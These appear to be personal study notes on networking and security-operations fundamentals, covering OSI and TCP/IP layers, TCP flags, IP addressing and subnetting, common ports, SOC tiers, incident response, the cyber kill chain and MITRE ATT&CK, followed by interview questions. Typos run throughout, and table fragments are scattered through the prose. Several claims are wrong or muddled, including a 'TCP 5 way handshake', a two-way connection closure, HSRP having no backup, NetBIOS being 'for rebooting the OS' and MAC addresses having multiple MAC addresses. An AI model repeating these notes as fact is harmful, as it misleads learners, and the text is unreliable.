Networking concepts

OSI leyers Open system interconnection 1984 iSO / ITU

In between two devices wants to cmmunicate ( Peer to peer, client ro server , or client DB
, client to application, client printer etc ) it will several procols rules or regulatation or
Def alogirthms and finally communication will happend betwqeen devices.
This communication is called as Cuumincation channel
This communication channel introduced ISO 1984. This communication chaneel is called it
as OSI layer cimmunication

ex: One of the end user wants to open facebook.com in the web browser
One of the end user weants to tranfer money
One the of the end user wants to book a rapido

There are seven OSI layers . Those layers are

7) Application layer
6)Presentation layer
5)Session layers
4)Transport layers
3) Network laywer
2)Data link layers LLC (logical control) VLAN
MAC (Media access
control)
1) Physical layer

Layer Data format or

Number Layer name Definiotn or desciption PDU Attacks
7 Application To provide any ifnroamtion or to get any information we can application layers Data OWASP TOP 10
SANS TOP 25
Features MITM
1) Webrowsing : HTTP (80),HTTPS ( 443), SSL (443), TLS (443) Session hijacking
2) Messaging : SMTP (25), IMAP ( 143), POP3 ( 110) , ICMP ( No port number)
3) Virtual terminal : SSH (22), Telenet (23), RDP (3389)
4) File transfer : FTP (20 , 21) , SFTP (22), SCP (22), NFS, CJFS , Winscp
6 Presentation It will convert one form of the data into another or other form of the data Data OWASP TOP 10
SANS TOP 25
Featrures or examples MITM
1) Encryption and Decryption Session hijacking
2) Encoding and Decoding
3) Data compression
4) Decimal to binary
5)Birnary to decimal
6) ASCII or EBCDIC

Encryption : Converting plain teaxt data or clear text data into encrypted data using
password or key or secret along with clogirthm is called as Encryption
Opposite to encryption is decryption
Note: Encryptiona dn decryption are bidirectional (Reverse possible) and also these
two are examples cryptography
2) Encoding : : Convertin messages linto audio or viod or some other formats of the files
is called as encdoing
Opposite to encodins decoding . This also bidirectional (Reverse is possisble)
3) Data compression: Compressing of the data
ex: Filecompression from 5MB to 3MB

Binary to decimal
1110 ==== 0+2^0 + 1*2^1+1*2^2+!*2*3
0+2+4+8=14 2 12
12 decimal number = 1100 2 6 0
2 3 0
1 1
5 Session It will manage the sessions Data OWASP TOP 10
SANS TOP 25
Features MITM
1) Session management - Managing the sessions Session hijacking
2) Authtication -Provoding the credentials and log in to system ( End user machines ,
Applications, cloud services, db, servers, etc) Poodle atatck
Autntication representa identity of the end user Heart bl;eeed atatck
Authication representa WHO AM I? Sweet32
3) Authorization : : Giving the permission or grans or access or previlge by backend server
to the front end user
Authorizayion represents WHO ARE YOU ?
Transport layer will provide end to end communication between two devices with out any
4 Transport errors (Errpr freaa control) and also data flow control it will deliver Segments / Datgrams TCP flood atatck
Syn flood attack
Featured UDP flood atatck
1) Segmentation
2) Error free control
3) Data flow control
Segementation- Devidning larger data into smarrer or largeer chunks of the data into
smaller chunks of the is alled as segmentation
 2) Error free control - Whenver peeer to peer to communication or clinet to server
comunication will happend Transport layer will deliver the message without any errors.
Sothat peer device can recieve meaningful message ( Every segment has seg id ,
sequence number, ACK number, source , desition port etc)
3) Dat aflow control ( Data tranfer rate): In between peeer to peer devices if we wwant to
send any data in the form transfer two devices it will exchange negotiations and whever
maximum capability existing as per their data transfer rate it will data flow

Example prootocl s
TCP and UDP
TCP- Transimmiosn control protocol - Dta cormat - Segment
UDP- User datagram protocol - Datagrams

TCP 3 way handshake Important

In between client and server or peer to peeer to devices , clinet will send SYN request to
the server, server will respond back with SYN+ACK and client will respond back with ACK
. The overall process is happening in three steps. Thats why this called TCP 3 way
handshake
TCP 3 way handshake can be used for connection intiation. TCP is a connection oeriented
protocol and relaiable protocol
TCP 3 way ahndshake it is using two flags . 1) SYN 2)ACK

TCP 2 way- handshake

In between client to server, client will send FIN request to the server and server will
respond back with acknowledgement
TCP 2 way handshake it will use 2 flags 1) FIN 2) ACK
TCP 2 way handshake can be used for conenction closure

TCP 5 way handshake = TCP 3 WAY handshake + TCP 2 way handshake

In between peeer to peer devices it will provide end to end communication using logical
3 Network address, routing and path determkination IP packets IP spoofing
Features of network layer ARP spffoing
1) Path determination :: Chsosing the best route or shortest route ( Based on AD-
Administravie distance) ARP flodding
2)Routing : IN between source and destination how many routing are existing and also it
based routing mechanism and routing protoclds Packet cniffing
3) Logical address (Virtual address): It is numericla number or label assigne to each and ICMP flood / Ping flood
every system atatck
Ping of death
As per the entwork routing digram there are two rioutes
Route number 1 - User A - R1-R2-R3-R4-R5-User B
Route number 2 - User A-R6-R7-R5- User B

As per the diagram AD distance of Route 1 is 76

Route 2 is -56
So finally when the message sending user A it will choose route number ( shortest route or
best route)

Example device under Network layer : Router

Example procols are : IP ( Internet protocl), ARP ( Addrress resilution protocol)
Example of routing protoclls are : Static route
Dynamic route ( It has multipel routes)
RIP ( Routing infoirmation protocol) - it will support up to 15 routers or hops
IGRP / EIGRP - Single location
OSPF - Open shortest path first - Its distirbuted locations
BGP - Internet connecvity L3 protocols

Router it will provide internet and router it will provide VPN connecvity
Router is an intelligent device
In we want connect two LAN's or two buildings , two ares, two states, two cities or two
conutries or two coninets Router is must device

RARP poisioning or
2 Data link layer In between peer to peer devices communication shopuld happen via media Frames spoofing attack
Example media RARP flooding attack
1) Water MAC flood attack
2) Air
2)Satttelite
4) Wirless

There are two sub layers

1) LLC ( logical link control): Logicallly if you sperate two lans ( VLAN) we can use switch
for that. Fo every VLAN we will assign ne of the dedicated id number is called as VLAN ID
2) MAC ( Media access control): Thorugh data can traversed form sourse to detnination

Example device under data link layer is SWITCH

Types of switches
1) Access switch All the end users
2) Distributed switch
Enire traffic of the
3) Core switch organization

Note : Switch will not suuport internet and also not support not for VPN
Switch is an intelligent device and it will broadcasts the traffic

Switching protocols are

 HSRP - Hot stand by rotuing protocol - Stand along ( No back up)
VRRP- Virtual redudancy routing protocol ( Primary and back up- HA)
STP- Splnning tree profocols - It will eliminate loopings L2 protocols

Phsical damaage of the

1 Physical It will provide end to end communication using phiscal cable connecvity Bits ( 0 and 1) cable
Phsical theft
Example device
Hub
Repeaters
Transcivers
Antennas
Transmotters
 It is a comuternetwork it will connect all the network devices ( Printer, LAN interface is internal
LAN Local arean network LT, WS, DT, servers, LB, router and swtcihes etc) in a single location interface

Note: LAN may or may not be reuirement internet

It is a computer network it will connect all the entwork devices together

from different geographical locations ( India and USA ) via internet or
WAN Wide area network public network

Note: WAN must required Router

Note2: Roiuter will provide internet and VPN ( Virtual private network) WAN interface is an
Note3: LAN is a subset of WAN iinternet interface

It is comouter network it will connect all the network devices together

MAN Metrolilitan area network across two different metrolitian cities using internet or public network

Note:MAN must required Router

Note2: Roiuter will provide internet and VPN ( Virtual private network)
Note3: LAN is a subset of MAN

It is computer network it will connect all the entwork devices together in

PAN Personal area network personal area or site

Note: PAN may or may not be reuired internet

Credentials Username and paasword

Provoding the cresadential and log into either end points ( LT, MAC,
Authitcation Mobile, WS, desktop) , servers or databases or application or cloud etc

Note: Authitcation will reprsent identify of the end user

Authication will represent WHO AM I ?

it will provide granting or permission to acces sthe services .

Authorization Authorization will be provided backend server

Examples auhtioriuzation can be granted by DC (Domain controller),

DB, Web server or app server or cloud
Authorization will represent WHO ARE YOU ?

It a site or room where we can deploy or implment all the network

Data center (DC) -primary devices in the rack mount using cables

Prerquisites
AC
Proper cabling
Ventilation
Plantation
Water
CO2
Door access

DR ( Diaster recovery )- Back up

siste It is a back or alternative fro primaty data center

Always DR site will maintain far away from primary site

DR site can be used as a high availability and when ever any business
diruptions or business outage it will happen we will continute business
operation from alternative site
DR site will fix Avaiulbility issue as per CIA triad

Types of cables 1) Ethternet or RJ45

2)Optical cable

Ethernet or RJ45 It will support only lower speeds like 1MB, 10MB, 100MB, 1GB

Optical cables It will higher sppeeds >1gb ( 10GB, 100GB, 1TB, 1 PB Etc )

CIA traid Confidentility Privacy of the data or only authorised users can access the data

Trst owrthy of the data or unathorised users or atatcker should not

Intigrity change or delete or mody or update the data

Inteigrty is awlays depending on Hash value of the data

Hash value can be generated for files and also for passwords

All the servers should be accessed or available to authirsed users or

Avaulability public or customer

As per security best practices availablepercentage is 99%

NOte: CIA traid os also calledas AIC triad

Vulnerability Any weakness in the system is called as Vulnerability

ex: CCTV cameras not installed
Security gaurd not existing
EDR is not installed
Firewall confired wrongly

Threat If the vulnerbility will be explouted or enaumrated is called as Thrsat

Risk Risk = Vulnerabiltiy * Threat

Destrctuin of damge
Risk = likelihood * Impact
Likelihood= how many time sicident or problem will occur
 Impact= Consequences because of threat or vulnebility ( Financial
orPeople )

AD Active directory
It is directory of the all the end users, end users systems and also OS
types and finally the servers information available

Grouping of simiar types of end user under one group is called as AD

AD group group

Note: AD can be confiured by Windows admin or system admin or local

IT or Network admin

Note: Ehever any security incident or alert is trgierred by differe

secvurity tools ( EDR, FW, SIE, PROXY, NIDS/NIPS, WAF, DLP Etc) , if
we dont get full detailsusername and ip address , OS types, we have to 1) Golden ticket atatck
coordinate with AD team to get full the details 2) Silver ticker atatck

Types of AD Onpremise ( DC AD)

Cloud based ( Microsoft, Google, Oracle, IBM, etc)

It is centralised authtication and athorization baceknd server. whenver

end user wants to log into end points DC will validate whether the end
DC Domina controller user is existing in the domain or not

Example domain name are

tcs.com
cts.com
infosys.com
google.com End point or end user
hcl.com authtication mehtods are
1) Kerbrose (Mutual)
2)SAML (Security
Note: All the autntication failure category of the atatcks ( Brute force assertion mark up
atatck, Password sparay, Rainbow table, pass the hash, dictionary ) End point or employee or end user lanagaueg) (End point
and Application)
3)NTLM (Windows new
Note 2: Event id for authtication failure : 4625 technology LAN
Event id for succesful authitcation : 4624 manager)

End point Employee machine or asset or host machine or end user machine
Example end points
1) Laptop
2) MACbook
3) Wroskstation
4) Desktop
5) Mobile

IP ( Internet protocl) IP in the form packets

It is a numerical number or label assigned to each and every system in

IP address (logical address) the organization

Versions of IP
1)IPV4-32bit number
2)IP V6- 128 bit

Evry NIC ( Network inerface card) has physical address is called as

MAC address (Media access control) MAC address

Example mac addess: 00:AB:CD:11:10:EF

MAC address bit number is 48

It can be user to connect in the LAN or WLAN . it can be converted

NIC card ( Network interface card) electrical signals to data signals (Messages)

IP Packet IP header Payload

Source ip - Where the packet is originating Piece of written code (Message)
Destination ip - Where the packet has to reach

Static IP Fixed ip or constatnt ip is called stayic ip

Note: Static ip can be assigned only server not to end user machines

Dynamic IP Changing the ip addrsss continuously is called dynamic ip

At a desk 10.10.10.1 9am-10am
LAN RJ 45
10.10.10.2 10-am to 11am Wireless
DHCP server ( Dynamic host DHCP server will allocate ip address automatically to end user using
configuration protocol) DORA process for specfic time period is called lease time

DORA
D- Discovery (End user) Broadcast
O- Offer ( DHCP Server)
R- Reuqest (End user)
A- Acknoblwdgement ( DHCP server will allocate empty ip addrees)

It will convert or map or resolute domain name into IP address or vice

DNS (Domain name server) verse (IP address to domain name)

Domain name also called FQDN ( Fully qualified domain name) or

hostname

Hostname Hostname is called as computer name or system name facebook.com delopers

ex: LT-HYD-1001 10.10.10.1 Windiws 2012
LT-HYD-rmanuraju IIS server

Fore domain name resolve in the DNS servers we have to configure

DNS records couple of records is called DNS records

Example:
A
AAAA
PTR
 MX
SOA

OSI layers (Open system OSI layers can be users for coomication purpose in between peer to
interconnection) peer(Neighbour or opposite) devices

ex: Client to server

server to client
client to DB
client to application

Practical expmaple 1) One of the end user is booking a cab

2) One of the end user id order food in Zomoto ISO/ITU IN 1984 introduced OSI
layers
OSI layers are 7

TCP/IP layers adavanced version of OSI layers

Under TCP/IP we have 4 layers

Malcious It is abnormal activity or illeagal or unathorised or supscious actvity

Malware Malcious software procram code

Sources of the maalware 1) Malcious malware atatchments phishing emails

Dowlading any files from internet or
2) Drive downloads websites
3) Files via Remivable devices

.Exe, .doc, .ppt, csv, xml, .html, .rar, .

Catgroy of Malware File oriented malware dll
WMI, Windows regsitry kesy ,
Filess oriented (Lolbins) Powershell , oythn exe, perl

Lolbins Living of the land binaries

WMI, Windows regsitry kesy , Powershell , oythn exe, perl

Examples of the malware 1)Virus

2)Worm
2)Trojan
4)Ransomware
5) Zdware
6)Spyware
7)Keyloggers
8) Mimikatz

Prevention or remediation Malware AV/AM/EDR ( NGAV)/XDR

Threat actor /Intruder/Attacker or Whoever is doing hacking to gain unthorised access , data exfilteration,
Hacker or Adversdary to get easyw ay earning money or to gain data

It is a piece of software file and it will provided vendor o r who will

Agent/Sensor develop the tool
Ex AV/AM vendors
Mcafee
Avast
AVG
Crowdstrike
DEfender
Sohpos
Norton

AV/AM it will protect or block or quarantine the all malware of catgroy of

AM/AV the atatcks

It will prevent or protect or block or quarantine all malware category of

EDR (NGAV) the atatcks

All these solutions can be

It will prevent or protect or block or quarantine all malware category of implemeneted under under ponits or
XDR the atatcks servs End point security

It will prevent or protect or safegaurd or block all the attacks it is

NDR happending int eh entwork level Network security
ex: Phsiing emails

It will prevent or block or protect or safegaurd in all the level across the
MDR ( SIEM +SOAR) organization whenever a security inciden is happend SOC (CS)

It will monitor inbound traffic or outbound traffic and based on the

Firewall (NGFW) policies configured either it will allow the traffic or block the traffic

The traffic is coming external or public ot internal organization is called

Inbound traffic or Incoming traffic as Inbound or incoming traffic ( IP packets)

The traffic is going from internal to external or internet or public is called

Outbound traffic or Outgoing traffic as Outbound traffic

Netflow The sum of the incoming traffic and outgoing traffic

Routers and Switces if we are using

Note: Netflow data terminology provided Cisco from Cisco Cisco
Jflow Juniper routers and switches Juniper
YES or S flow Hp routers and Switches HP
Netflow Avaya
Netflow Hauwei
Netflow Aruba
Netflow IBM

Policy Rules or conditions or regulations or Protocol or correlation rule

 DLP (Data loss or data leak It will prevent or block or safegaurd all the data breaches or data
prevention) exfilterations or data exposure or leaking of the data

DLP types End point

Network
Websites / Applications
Cloud

iNtrusion It is malcious or abnornal or illgimate or suspcious actvity

Whenever any abnormal or supsiocus or illegitmatae or unathorised

actvoty will be happen by an atatcker IDS will do monitoring and
IDS Intrusion detection system detection only but it will block or prevent the abnormal actvity

Whenever any abnprmal or malcious or suspcious or illigitmate or

aunthorised actvity will be done aby an atatcker IPD will do detection,
IPS Intrusion prevention system identification and also preventing and blocking the abnormal actvity

Types of IDS / IPS Host ;level or End point level HIDS Deployment : Agent and
HIPS server (Tool)

SPAN/Mirror or
Netwrk level NIDS Promiscous
Inline method O
NIPS rpromiscious

SPAN/Mirror or
Wireles or wife WIDS Promiscous
Inline method O
WIPS rpromiscious

OWASP TOP 10 Open web application security poroect

2024 Application TCS
It is an instituon or organization will conduct susrbey or application layer
atatcks ( Layer 7) and finally OWASP will make top 10 atatcks INFOSYS
Bank America
Intially OWASP isconducted survey on 2010 and later SBI
COntinetal
2013 health
2017 AT&T
2021

EX: SQL injection atatck (Injection falw atatck)

CSS atatck (Cross sitescripting attack)
Broken access control
Broken uahtication
Insecure design

Note: OWASp is providng survey in Application , Mobile and also ICS (

industrial control system)

It will prevent or block or safegaurd all OWASP TOP 10 acategory of the

WAF (Web application firewall) atatcks ( Application layer or layer 7)

Ex:Akamai
Barracuda
Imperva
Citrix
F5

SDLC life cycle Software development life cycle

Phases of SDLC life cycle

1) Reqwuiremen
2)Design
3)Devlopment
4)Testing
5)Release phase Agile / Scrum

Application security or Product

security or Mobile security OT, IOT ,
SSDLC Secure Software develoment life cycle IIOT

CI/CD Continous integration and Contious development

CIS benchmark or audit polcies CIS is an organization is providing benchmark or compliances to Mobile
(Center for internet security) OS, end point OS, Cloud , Servers and data bases
Microsoft windows sever 2012 R1 225 CONTROls
It is intial security configurations or implmentation can be configured in
the OS side to reduce atatck vector or attack complxity
150 Paased
Note: CIS benchmark compliances can be implmented respective
Mobile teams, Servers team, End point team, DB team and cloud team 75 Controls failed
Note2: VUlnera bility analyst roles audting or verifying all the
compliances are configured and also passed or failed

SIEM (Security information event

management) It is combination both SIM and SEM 2005
SIEM tool is a
1) Log collection or Log onabording or log integration
2)Log processing
3)Log analysis
4)Log monitoring
4)Incident alerting tool
5)Incident investigation tool

It is dedicated room or site where the cyber security analys ot

informations enalysts will sit and they willmlnitor 2$*7*365 days and
whenver any security incidents will be trgggers these cyber security
analysys (L1, L2 and L3) will take security incident investigations or
SOC (Security operation center) Forensic analysis

Other names for SOC Blue team

 Defenstive team
CERT- Computer emrgency responce team
CSIRT-Cyber security incident rrsponse team
SIRT- Security incident rreponse team
CDC - Cyber defence center

It is a document and it will provide step by step process of how, where,

when , why the incident is got compromised and how we have taken
RCA (Root cause analysis) care incident response
This document it will act as a reference document or Knowledge base
document for future reference

MTTD (Mean time to detection) The average time taken to detect the incident
The avrage taken for idenfything of the incident ( Malware, authication
MTTI ( mean time to indeifcation)' failre, OWASP TOP 10, Flooding , sppofing and so on)

MTTR (Mean time to reciovery( The avarage time taken for data recovery

Levels of the SOC or Support Securyt analyst , Cyber security

structure Level1 or Tier 1 or L1 analyst, Information security analyst 0-4 years
Senior securty analyst , Senior cyber
security analyst, Senior security
Level2 or Tier 2 or L2 analyst, Threat detector 4-6 years
Threat Hunters, Malware analsysis,
Reverse enginerring, Forensic
Level3 or Toer 3 or L3 analysis 6-9 years
SME ( Subject matter expert) Tenchinical stonrg 8+
Level4 or L4 or Tier 4 SOC Manager 8+

SOP (stanarad operating procedure This document it will provice when ever security iincident reccived what
documents) or Playbook or Run L1 team has do, what L2 team do and what L3 team has do by providing
book steps or instrcuons for different types of security incidents or atatcks

Proxy or web gateway or application It is a gateway or bridge between end users to external websites or
gateway or Secure web gatway applications

Proxy can validate whenver end user or public they are trying access
any websites , it will validate whatver reqsuted websites contain any
malcious content or not. Incase website contains malcious content
Proxy can block it, incase websites does not contain malcious content it
will block but it will allow

Blocking of either IP address , Hash value, Domian name URL link,

Blocklisting MAC adress etc in the respctive tools is called blocklisting

Allowing or gratning or giving the persmision to ip address, hashvalue,

domain name , URL link and mac address in the respective tools is
Whitelisting called as whitelisting

The process of converting plain text data or clear text data into
Encryption encrypoted data using password or key

The encryopted data can be convrted into plain text data or clear text
Decrption data

VPN is virtual network it will form in betwen end user to office location
VPN (Virtual private network) via pblic network or internet using tunnel

Types of VPN 1)Remote/VPN/IP SEc vpn

2)Site to site VPN

Note: VPN will provide confidentility , Encryption, authticity,

Authorization and Non repudation

types of Ex: DB encryption, OS necrption,

encryption Data at rest encryption In the rest of the data we are encryption is called as data at rest Disc encrption
in the trafer level data cn be encrtpted is called as data at trsbit level
Data at tranis encryption encryption
ex: VPN authication
Web sites access
RDP access
Email

FIM (File integrity monitoring)

Intigrity :Trust worthy of the data or unathorised atatcker or user should
not add/delete or modify or change the content of the data

Integrity cna be moniotred to idneitfy any malware infection are

executing by an atatcker orelse internal employees or users they are
trying to access unathorised afile

It is iphase by phase by or step by step approach how the threat actor

will do ahcking part of targedted machine ( End user machine, Servers,
databased, network devices, applications, cloud, mobile, OT, IOT
Cyber kill chain process devices etc)

Cyber kill chain pahses are

1) Recon or Reconnassiance
2) Weaponisation
3) Trabsport /Delevery
4) Exaploitation
Persistence - Contious monitoring 5) Installation
6) C2C control ( Commod and control )
7) Action objective

Note: Cyber kill chain process is a offensive mechanism ) Hacking can

be done by an atatcker)

MITRE ATT@CK framework

A- Adaversary ( Attacker)
T- Tactics\ 14
T-Techniqeues 500+ techniques
CK- Knlwedge base \

TTP Tactices, Techniqeues and Procedure

 It is cetralised databased it will provide atatcker tacics, technique and
procedures along with that it will provide defensive mechanims like
detections and mititgations as well
It is combination of both offensive and defensive mechanism

Under MITRE attack framework there are 14 tactics and 500+

techniques

Interview questions 1) What is meant cyber by cyber kill chain process ? Exaplin
2) Take any of the cyber or network atatck and explain via cyber kill
chain process ?
3) What is the difference between cyber kill chain process versus
MITRE attack frameowkr?
4) Take any 4 or 5 tactcies as per MITE attack framework and explain
atleast 2 or 3 techniques for each and evry tactic?
5) How are you utilizing MITRE attack framework in your organization ?
It is step by step process or pahase by pahse by approach how we can
take care security incident investigation or Forensic
Incident life cycle maangement analysis whenever asecurity incident is recieved

Incident life cycle management

frameworks orgnizations 1) ITIL - Information technology and infrastructure library
2) NIST- National institure of standarad technology \
ITIL NIST
ITIL incident life cycle management 1) Preparation 1) Identify
2) Indetification 2)Detect
3) Containment (Network isolation / Disconnecting from the nework) 3) Protect
4)Eradication/Mitigation 4)Recover
5) Recovery 5)Report
6)Lessons learned or Post mattern report

Log Any computer recorded activoty or action is called as log

Exampales windows log types Windows log on/in types

1) APPlication
2) Security or Audit
3) Set up ( Configuration)
4) System ( Performance)
5) Forwarded events

Event abnormal change of log is called as Event (Attacker )

There are two different types actvities

1) Normal - Non malvcious or non supcious or legitmtate
2) Abnormal - Malcious or suspicious illgitimatiate or unathorised

Alert Nottification of abrnoaml activity iso callec as Alert

Types of recveing the nortifications

1) Email
2) Mobile
3) Security tool (Dashboard)
4) Syslog
5) SNMP traps

it will give neagtive impact to organization for CIA (confidentility ,

Incident integrity and avail;bulityb) Coporate IT Engineerring )R&D)
All operational support teams 1) Product t=development
1) Application
1) Help desk/Serve desk devbelopment
2) Assety inventory / Local IT 3) Mobile development
3) Windows aupport 4) devops
2)Linus support 5) ML/AI
5) Siorage and back up
6) NOC ( network operation center)'
7) DB auspport team
8) Application support rem
9)SOC team

It will convert or map Layer 3 (Network ) ip address to Layer 2 (MAC

ARP ( Address resolution protocol) address)
RARP (Revrse adress resolution
protocl) It will convert or map layer 2 MAC address to Layer IP address

Legacy Older or outdated or EOL or EOS

End point aiuthitcation mechanisms Kerbrose Mutual authication 88

NTLM
SAML One way authication

Network Radius
TACACS+

Application authication Open id connect with Oauth 2.0

SAML
JWT Get and Post

AD ( On premise or Cloud ad) along with IAM with group polocus and
Cloud side authication along with Multifactor authtication

Server by proviidng username and password Windows

By providing username and password along with private Key
 Differences between TCPand UDP
TCP UDP
TCP is a Transmission control protocol UDP is a user datagram protocol
TCP is connection oriented protocol UDP connection less oriented protocol
TCP is relaibale UDP non relaiable
TCP it will use dataformat as segements UDP data format as a datagrams
TCP is slower UDP is faster
TCP it will use feedback or
acknoledgement There is no feedback or acknolwedgement

Difference between router, Switch and Hub

Router Switch Hub
Router is an intelligence device Switch also is an intelligence Non intelligenct
Router will fall under layer number 3 ( Hub will fall under layer 1 (
Network layer( Switch will fall under Layer 2 ( data link ) Physical number)
Router will use logical address is called ip
address Switch will use use physical address is called MAC address NA
Router data will use data format IP
packets Switch will use frames Hub will raw bits
Router will support VPN Switch will not support VPN Hub also not support VPN
Router will support internet Switch will not support for internet Hub will not support for internet
For routeting router will use one of the
mode names is called Route mode ( L3
mode) or NAT mode Switching will use mode names is aclled as Switch mode or Layer 2 mode NA
Example routing protocols Example routing protocols Example routing protocols
RIP, OSPF, BGP, IGRP, EIGRP etc STP, VRRP, HSRP P2P, ADSL SDSL

Note Firewall can be deployed or implemented using Route mode ( L3 mode or NAT mode)
Firewall also can be deployed using Switch mode ( Layer 2 mode)

TCP oacket practical use case is whenever any netwrok related issues,
outages issues log onboarding issues , performances will issues will happen
or occur we will do in between source and destination using packet capture
TCP packet and will analyse TCP/IP layer analysis ( Wire shark)

IP packet Ip header Payload

Mesaage content or peice of
S.IP- packet is originating written code
D.IP - Packet is going

IP oacket practical use case is whenever any netwrok related issues, outages
issues log onboarding issues , performances will issues will happen or occur
we will do in between source and destination using packet capture and will
analyse TCP/IP layer analysis ( Wire shark)

TCP flags can be used to confirm or to audit whether messages are delivered
TCP flags in between peeer to peer dvices

Types of TCP flags

1) SYN
2) ACK
3) FIN
4)RST
5)URG
6)PSH

When the SYN flag is enabled ( SYN=1) intial connection will be intiatiated
1) SYN ( synchrinization) between peer to peer devices Enable = 1
When the ACK flag is enabled ( ACK=1) feedback or confirmation from the
2) ACK ( Ackno;wdgement) server or client will be confirmed Disable = 0
When the FIN flag is enabled ( FIN=1) , it is the last packet to send in
3) FIN ( Finish) between peeer to peer devices and there is no other packet sent
When the URG flag is enabled ( URG=1) , it will give the high priority and this
packet will reach to destination first without verifying existing packets buffer
4) URG ( urgent) or queue
When PSH flag is aelnalbed ( PSH=1) , it will push the isting packets it is
5) PSH ( PUSH) avail;anle in the queue but it will follow the sequence
When the RST flag is enabled ( RST=1) it will form fresh conenction in
6) RST ( Reset) between source and destination after packet dropped

TCP/IP lyers It is adavnced version of OSI layers

It contains four layers

TCP/ IP layer's (TCP/IP reference model)

Layer Number Layer Name OSI reference model TCP / IP layers
7 Apllixcation Apllixcation
6 Presentation Presentation
5 Session Session Application Data
Segment /
4 Transport Transport Transport Datagrams
3 Network Network Internet Ip packets
2 Data link Data link Network interface or Network Frames and
1 Physical Physical ethernet Raw bits

Pratical use Network traffic analysis

1) Log onabording
2) Network outage relsted issues
3) Performance related issues like server, network and also Application

Wire shark Latest version 4.4

It will provide network traffic analysis in between source source and

destintion using PCAP ( pacap) or TCP dump analysis using TCP/IP
reference model;
 Client side errors or server side
erros and also all the HTTP
request and HTTP responses
are happening properly using
Open id connect with Oauth 2.0
and JWT toekn based
mechanism and addionally even
we have to verify DNS records
In the application have to verify on between source denstination are configured are properly not
All the TCP flags are confiuired
properly , and also TCP 5
In tne Tranport layer sude in betwene source and destination we have to handshake is completed
veirfy successfully or not
In the Network or internet layer in between source and destination have to
veirfy Packet routing
Pack is retransimted
Packet is blocked
Packet is allowed
Is there any physical connecvity
issues using cables ? and also
also is there VLAN confiuration
relateds and also frames is
causing any half duplex and full
In the network interface or network ethernet side duplex issues

NIC card ( Network interface card) or NIC

ethernet interface It can be used to enable or to connect systems into LAN or WLAN
NIC card can be fuctined as a converting of electrical signals to data signals

Every ethernet interface has one of the physical address is called as MAC
Physcial address or MAC address address

Note: Every MAC address has more than ONE MAC address

Bit number of the MAC address : 48 Bit

example : 00:AB:CD:EF:01:11

Every OEM vendor at the time manfuctring the product they will provide
dedicated number for identfying and trachking purpose. Thats number is
Serial number called serial number

Note: Every system has only one serial number

Evry system we will assign one of the numerical number orlablel . That
Logical address or IP adreess address is called IP address

Example : 10.10.10.1

Versions of the IP packet 1) ipv4 32 bit

2)ipv6 128bit

Why are we migrating from IPv4 to IPv6 ?

1) lack of IPv4 addresses
2) Security purpose

How to purchase Private address IANA- Internet assoigned number authority

Classes of ip Addresss ( Private and

Public) There are 5 classes of ip addresses Range
Class A 0.0.0.0- 126.255.255.255
Class B 128.0.0.0- 191.255.255.255
Class C 192.0.0.0-223.255.255.255
Class D 224.0.0.0-239.255.255.255
Class E 240.0.0.0-255.255.255.255
Loopback address 127.0.0.1

Private IP Address range 10.0.0.0-10.255.255.255 Class A

172.16.0.0- 172.31.255.255 Class B
192.168.0.0-192.168.255.255 Class C

How to identify whether the securitty

incident or attack is internal ( Insider
Threat) or external atatck ? Based on the ip address

1) One of the DoS atatck is happening thorugh 172.32.0.0? External atatcker

2) One of the data exfilteration is happening via 192.168.1.1? Insider threat

In the atatck is happing with in the organization by an employee is called as

Insider Threat iNsider threat
Ex: Sending project related cos from business email ido to personal email id

Externall atatck If the atatck is coming public ip range we can callit as external attack
Ex: Phsihing email coming from 1.1.1.1
SQL injection atatck is happening from 2.2.2.1

Bit 0 or 1
Byte 8 bits
Octa 8
Decimal Any number
Hexa decimal 16

Subnet Larger network can be devided into small network is called as subnet

For excample ip address range of the overall oragnization

10.10.0.0/16 Overall ip address 65536
10.10.10.0/24 End use LAN 256
10.10.20.0/24 Server LAN
10.10.30.0/24 DB
10.10.40.0/24 Developemtn
 10.10.50.0/24 Testing

10.10.0.0/16

Subnet mask for /8 1111111.00000000.00000000.00000000 1*2^0+1

255,0.0.0

Subnet mask for /16 11111111.111111111.0000000.000000000

255.255.0.0

subnetmask for /17 11111111.11111111.10000000.00000000

255.255.128.0

Ports and Protocols

It a numerical or software defined number and it can be used for

Port communication between peer to peer devices

It will provide or it will idenitfy what type of service is running or what type of
process is running on or what type of application running against the port
Protocol number

Types of ports 1) Open ports

2) Closed ports
3) Filtered ports

Which ports are beteer? Always closed ports are beteer due to security reasons
Incase if any dangrours ports are opended atatcker or intruder will use pen
test tools and he will use port scanning mechainsiem and he will enter into
the orgnization level. In such a way atatcker will gain aunthorised access or
sentive data exposure

How to verify what are all the ports

opened in the system ? cmd >netstat

How many number of total number of

ports are available for each and every
system ? Totai munber of ports in any system 0-65535 ( 65536)

Regular or well known ports can be used for communication 0-1023 ( 1024)

Incase any of org internal stake holders ( Devops, storage, back up,
Business requirement / Business windows, unix, middleware, ML.AI, App develeroprs, Cloud computing etc)
exception retired to open the they have to floow below process
1) Internal stake holders has to fill the firewall templete
2) Create a ticket in the ticketing tool and assign to firewall team
3) Firewall risk assement team will verify or validate or will do BIA ( Busines
simpact analysys)
4) After firewall risk assement compelted the riask anlysis and BIA they will
assign the ticket to firewall implementation tema
5) Firewall implementation team will raise change request part of chanage
management procress and they will implement prod environment after the
approval accepted by CAB diector
6) Firewall implementation team will implement in policy in the firewall

Destination
Firewall templete Rule name Source ip Destination ip Source zone zone Protocl Poert number
Application development 10.10.10.1 ( Web serve) 10.10.10.2 Internal Internal https 8443
Oracle DB ip
2) Copying or data transfer i geween Postegress SQL data base Oracla DB Postegrees SQL db IP address Internal Internal FTP 20 & 21

Protocol Importance Port number

FTP ( file transfer protocol) For transferring of the files ( It is not a secure port) 20 and 21
SFTP ( Secure file tranfer protocl) Transferring of the files in secure way 22
SSH ( Secure shell) To log in to unix OS using putty application 22
SCP ( Secure copy) Copying of the data ins ecure way 22
Telent ( Telecommunication network) To log in one unix OS into another unix OS . 23
SMTP ( Simple mail transfer protocl) To recive and to send an emails 25
DNS ( Domain name server) To convert domain name into IP address or ip address into domain or FQDN 53
DHCP ( Dynamic host configuration
protocl) It will allocate ip addtress end user system using DORA process automatially 67 & 68
Kerbrose Mutual authtication for windows OS ( in betwen end user AD/DC) 88
NTP ( Network time procol) To sync or syncronize local time with tool time or network devices time 123
IMAP ( internet message access protocol) Messing sending or selvering purpose we can use IMAP 143
POP3 ( Post office protocl) Messing sending or selvering purpose we can use Post office prptocl 110
Netbios ( Net bias input and output
system) For rebooting the OS and configruing the OS and debuging purpose 137, 138 and 139
